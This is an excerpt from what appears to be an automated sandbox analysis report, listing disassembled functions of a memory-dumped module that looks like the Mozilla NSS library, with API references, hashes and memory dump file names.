                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Alloc_ArenaUtil
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2062749931-0
                                                                                                                                                                                                                                                      • Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                                                                                                                      • Instruction ID: a8788998a6fd76f563cbe1600050f283c24e53028c96ac3c35cd570e985233b8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7371E176F017018BD718CF19C8C1F6ABBF2AB88304F14862DD85A97BA1D734E901CB92
                                                                                                                                                                                                                                                      Function 6C3F5F30 Relevance: 1.6, APIs: 1, Instructions: 350stringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 6C3F6013
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: strcmp
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1004003707-0
                                                                                                                                                                                                                                                      • Opcode ID: 840eb637dfe9c570d2c6647f456a73852aee039d081ced33e9a46e91c3500f5d
                                                                                                                                                                                                                                                      • Instruction ID: de3f0e9d31e7882b831b8b3ca32eedcb1b416a2f90dbc4e43250c8a533c0f382
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 840eb637dfe9c570d2c6647f456a73852aee039d081ced33e9a46e91c3500f5d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99C10670B046068BEB04CF55C8507AAB7B2AF85318F248A69D9B5D7B52D736E843CF90
                                                                                                                                                                                                                                                      Function 6C585E60 Relevance: 1.4, APIs: 1, Instructions: 163COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C585B90: PR_Lock.NSS3(00010000,?,00000000,?,6C46DF9B), ref: 6C585B9E
                                                                                                                                                                                                                                                        • Part of subcall function 6C585B90: PR_Unlock.NSS3 ref: 6C585BEA
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000014,00000000,-000000D7,?,?,?,?,?,?,?,?,6C585E23,6C46E154), ref: 6C585EBF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LockUnlockmemset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1725470033-0
                                                                                                                                                                                                                                                      • Opcode ID: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
                                                                                                                                                                                                                                                      • Instruction ID: f4495ee446a192ce67095fecb5c3b3f76a53c03df69ee3767f01726c255fc93f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1951ADB2E0122A8FDB18CF59CC815AEF3B2FF88314B59456DD816B7745E730A941CBA0
                                                                                                                                                                                                                                                      Function 6C53DCD0 Relevance: .4, Instructions: 371COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 34d7ca0ceb17a1a302ae869c6a2d63744bc39f6d42108fc73a8c1ac198d537cb
                                                                                                                                                                                                                                                      • Instruction ID: 491a7721688c42d8347d907df5f11014933312a04e7844ab959fd5bf05349627
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34d7ca0ceb17a1a302ae869c6a2d63744bc39f6d42108fc73a8c1ac198d537cb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3F14B71A01215CFDB08CF19C884BAA77B2BF89314F298168D8099F751EB75ED42CBD1
                                                                                                                                                                                                                                                      Function 6C4D1DC0 Relevance: .3, Instructions: 345COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
                                                                                                                                                                                                                                                      • Instruction ID: fd57fcd32a7b9346ac8f5266c1873689f20a672c42ab38db9a1497f273de3882
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18D14632A046568BDB11CE18C8A4FDA7763AB85338F1A4329DD651B7C2C77ABD06C3D0
                                                                                                                                                                                                                                                      Function 6C468EA0 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 3ab0e84a488cee959b35fcaef245c91779c5305976c1e59583ff95b8ddef9bd4
                                                                                                                                                                                                                                                      • Instruction ID: 8d751254f5ad44682fe689a5ba1be565b54bea5321856b842014a88d76f5698e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ab0e84a488cee959b35fcaef245c91779c5305976c1e59583ff95b8ddef9bd4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42119D72A002158BD708CF26D888F5AB3B5BF42319F05426AD8158FF56D775E886C7C5
                                                                                                                                                                                                                                                      Function 6C540C40 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 5cda95d6ea283ee4c9e137fe1ed44031aa8ab0ec70079be82106298fc116dd0f
                                                                                                                                                                                                                                                      • Instruction ID: d25f0e901baf5ff052fb3f2ac6c73b6854e2bffe186b072f740d0dad83214ea4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cda95d6ea283ee4c9e137fe1ed44031aa8ab0ec70079be82106298fc116dd0f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C11BF75604345CFCB00DF28C88466AB7B1FF95368F24C46AD8198B701DB71E8068BA1
                                                                                                                                                                                                                                                      Function 6C4B3FF0 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterSectionUnlockValue$Error
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2275178025-0
                                                                                                                                                                                                                                                      • Opcode ID: da28c0726b2ccbccd98010155c0125c32c9e807d7d43393f1c044887029a7ef5
                                                                                                                                                                                                                                                      • Instruction ID: c891e00470e6123313c328551daa3705a8441217cb560e16859f234145f4028b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da28c0726b2ccbccd98010155c0125c32c9e807d7d43393f1c044887029a7ef5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0F05E70A047998BCB10DF29C95159AB7F4EF49254F129619EC8AAB301EB70BAC4C7D1
                                                                                                                                                                                                                                                      Function 6C540D60 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                                                                                                      • Instruction ID: 66205555311cee1b0cfca9708c5c25835345e99bc65d725c80bf8e87d57c4cfc
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2E06D3A202054A7DF148E09C850AA97359DFD1719FB4C47ACC5A9BA01D633F8078B81
                                                                                                                                                                                                                                                      Function 6C46CC60 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: ce921e347125e3643dbba53842544590a282e1556149b4fb4ef37e8064b9634a
                                                                                                                                                                                                                                                      • Instruction ID: 125497e14dffb1c6e42affd9423d06053cedafd3d1ebd8773e18b965bd28bf74
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce921e347125e3643dbba53842544590a282e1556149b4fb4ef37e8064b9634a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10C04838244708CFC704DB08E8899A43BA8AB096107054094EA028B721EB21F840CA88
                                                                                                                                                                                                                                                      Function 6C4B9840 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 25f1b04af2d414bc709eb0aa962eb82f9c46809ed6268de7c23cbda30ddf6cb0
                                                                                                                                                                                                                                                      • Instruction ID: 47104a29f38758b626e9fd1b87f1f88c6e7dc0f92f2b434e0ef660784f2bd3ff
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25f1b04af2d414bc709eb0aa962eb82f9c46809ed6268de7c23cbda30ddf6cb0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                      Function 6C4D5DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6C4D5E08
                                                                                                                                                                                                                                                      • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C4D5E3F
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6C4D5E5C
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4D5E7E
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4D5E97
                                                                                                                                                                                                                                                      • PORT_Strdup_Util.NSS3(secmod.db), ref: 6C4D5EA5
                                                                                                                                                                                                                                                      • _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6C4D5EBB
                                                                                                                                                                                                                                                      • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C4D5ECB
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6C4D5EF0
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4D5F12
                                                                                                                                                                                                                                                      • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C4D5F35
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6C4D5F5B
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4D5F82
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6C4D5FA3
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6C4D5FB7
                                                                                                                                                                                                                                                      • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C4D5FC4
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4D5FDB
                                                                                                                                                                                                                                                      • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C4D5FE9
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4D5FFE
                                                                                                                                                                                                                                                      • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C4D600C
                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4D6027
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6C4D605A
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(6C5AAAF9,00000000), ref: 6C4D606A
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4D607C
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4D609A
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4D60B2
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4D60CE
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
                                                                                                                                                                                                                                                      • String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
                                                                                                                                                                                                                                                      • API String ID: 1427204090-154007103
                                                                                                                                                                                                                                                      • Opcode ID: 3ce9627da797c287500cb1c4c359e89076e15484484d005fff55d1a31af77e3d
                                                                                                                                                                                                                                                      • Instruction ID: d7d0e43d949374730e3df7721b3848e3fdf1a0f9ee5eec15076dd9646009c8f8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ce9627da797c287500cb1c4c359e89076e15484484d005fff55d1a31af77e3d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8391F5F09042055BEB01FF659C95F9E3BA4DF06289F0A0468EC559BB42EB31F905C7A2
                                                                                                                                                                                                                                                      Function 6C461D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C461DA3
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6C461DB2
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: TlsGetValue.KERNEL32(00000040,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461267
